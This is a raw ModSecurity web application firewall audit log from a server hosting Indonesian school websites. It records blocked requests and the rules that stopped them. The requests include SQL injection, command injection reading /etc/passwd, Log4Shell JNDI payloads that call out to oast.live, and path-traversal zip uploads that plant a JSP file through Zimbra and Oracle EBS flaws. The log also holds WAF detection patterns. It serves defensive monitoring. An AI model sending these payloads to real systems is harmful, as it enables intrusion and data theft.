p1=391, p2=3184, p3=0, p4=0, p5=40, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8201740-Z-- --a759726a-A-- [29/May/2025:06:46:43 +0700] aDegY8X5pbyFXv2T3ipbCQAAAMI 103.236.140.4 36176 103.236.140.4 8181 --a759726a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3730.0 Safari/537.36 Accept-Charset: utf-8 --a759726a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a759726a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748476003919815 748 (- - -) Stopwatch2: 1748476003919815 748; combined=295, p1=255, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a759726a-Z-- --75773c52-A-- [29/May/2025:07:27:52 +0700] aDeqCH1Ye2lUDKzW1LvHEQAAAAk 103.236.140.4 37530 103.236.140.4 8181 --75773c52-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.239.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.239.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --75773c52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75773c52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748478472855624 2935 (- - -) Stopwatch2: 1748478472855624 2935; combined=1533, p1=477, p2=1010, p3=0, p4=0, p5=45, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75773c52-Z-- --e945e156-A-- [29/May/2025:07:29:52 +0700] aDeqgH1Ye2lUDKzW1LvHHwAAAAg 103.236.140.4 37602 103.236.140.4 8181 --e945e156-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.252.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.252.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e945e156-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e945e156-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748478592042382 3337 (- - -) Stopwatch2: 1748478592042382 3337; combined=1411, p1=484, p2=894, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e945e156-Z-- --f583234b-A-- [29/May/2025:07:41:21 +0700] aDetMf4vV4CoZ0MKLMPhBQAAAIQ 103.236.140.4 39676 103.236.140.4 8181 --f583234b-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163061205 --f583234b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f583234b-E-- --f583234b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748479281419873 3349 (- - -) Stopwatch2: 1748479281419873 3349; combined=1709, p1=445, p2=1234, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f583234b-Z-- --401a4e34-A-- [29/May/2025:07:41:22 +0700] aDetMv4vV4CoZ0MKLMPhCgAAAJY 103.236.140.4 39694 103.236.140.4 8181 --401a4e34-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 75 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 167904435 --401a4e34-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --401a4e34-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --401a4e34-E-- --401a4e34-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748479282424354 1705 (- - -) Stopwatch2: 1748479282424354 1705; combined=506, p1=355, p2=122, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --401a4e34-Z-- --1c04ba50-A-- [29/May/2025:07:41:24 +0700] aDetNGMaQtTb69S13pj1UAAAAEA 103.236.140.4 39724 103.236.140.4 8181 --1c04ba50-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0rjil9gpeoh536h8tf0hks4mbnkjk77w.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0rjil9gpeoh536h8tf0tkc64ztkr7nx8.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0rjil9gpeoh536h8tf0ocxyywumy4dzd.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0rjil9gpeoh536h8tf0ph3gijt9temor.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0rjil9gpeoh536h8tf0no9ggj3e8ux4x.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0rjil9gpeoh536h8tf0m3xcq9wzg5p9x.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0rjil9gpeoh536h8tf0askrebn3ak4ix.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0rjil9gpeoh536h8tf0tnu6map7ibmso.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0rjil9gpeoh536h8tf0nz7sibmik4tch.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0rjil9gpeoh536h8tf0fzxrbiktp3gk1.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0rjil9gpeoh536h8tf0s1b786o6373w7.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0rjil9gpeoh536h8tf0dtqp53tn1cp3g.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0rjil9gpeoh536h8tf0w9ec6dcub3b71.oast.live} X-Origin: 
${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0rjil9gpeoh536h8tf0hq3cxursap9z4.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0rjil9gpeoh536h8tf0rjrrqiokifho3.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0rjil9gpeoh536h8tf0d7579urnt4sg6.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167904447 --1c04ba50-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1c04ba50-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748479284420662 5916 (- - -) Stopwatch2: 1748479284420662 5916; combined=4267, p1=447, p2=3772, p3=0, p4=0, p5=48, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c04ba50-Z-- --8b67f279-A-- [29/May/2025:07:41:25 +0700] aDetNf4vV4CoZ0MKLMPhFQAAAIY 103.236.140.4 39746 103.236.140.4 8181 --8b67f279-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 39 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 167904456 --8b67f279-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --8b67f279-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b67f279-E-- --8b67f279-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748479285644810 2999 (- - -) Stopwatch2: 1748479285644810 2999; combined=1839, p1=513, p2=1292, p3=0, p4=0, p5=34, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b67f279-Z-- --e05f1124-A-- [29/May/2025:07:48:12 +0700] aDeuzP4vV4CoZ0MKLMPihAAAAI0 103.236.140.4 44478 103.236.140.4 8181 --e05f1124-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 585 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 153683054 --e05f1124-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!MD>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --1ea3d83c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ea3d83c-E-- --1ea3d83c-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748483563805749 5359 (- - -) Stopwatch2: 1748483563805749 5359; combined=3870, p1=537, p2=3291, p3=0, p4=0, p5=42, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ea3d83c-Z-- --090b6b1a-A-- [29/May/2025:08:52:43 +0700] aDe96_4vV4CoZ0MKLMPkhAAAAIU 103.236.140.4 57010 103.236.140.4 8181 --090b6b1a-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 716 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165249969 --090b6b1a-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --090b6b1a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --090b6b1a-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748483563811748 4553 (- - -) Stopwatch2: 1748483563811748 4553; combined=3356, p1=370, p2=2957, p3=0, p4=0, p5=28, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --090b6b1a-Z-- --b9db305a-A-- [29/May/2025:08:55:34 +0700] aDe-lsX5pbyFXv2T3ipgcgAAAMU 103.236.140.4 57062 103.236.140.4 8181 --b9db305a-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 165249989 --b9db305a-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" 
begin 664 test.zip M4$L#!!0``````&UP-%:3!MD>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --0dfdfb28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dfdfb28-E-- --0dfdfb28-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748488569808248 5661 (- - -) Stopwatch2: 1748488569808248 5661; combined=3768, p1=538, p2=3196, p3=0, p4=0, p5=34, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dfdfb28-Z-- --33c7ad13-A-- [29/May/2025:10:27:10 +0700] aDfUDmMaQtTb69S13pj7rQAAAEU 103.236.140.4 59096 103.236.140.4 8181 --33c7ad13-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 69.163.195.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 69.163.195.137 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --33c7ad13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33c7ad13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748489230672043 3353 (- - -) Stopwatch2: 1748489230672043 3353; combined=1501, p1=516, p2=952, p3=0, p4=0, p5=32, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
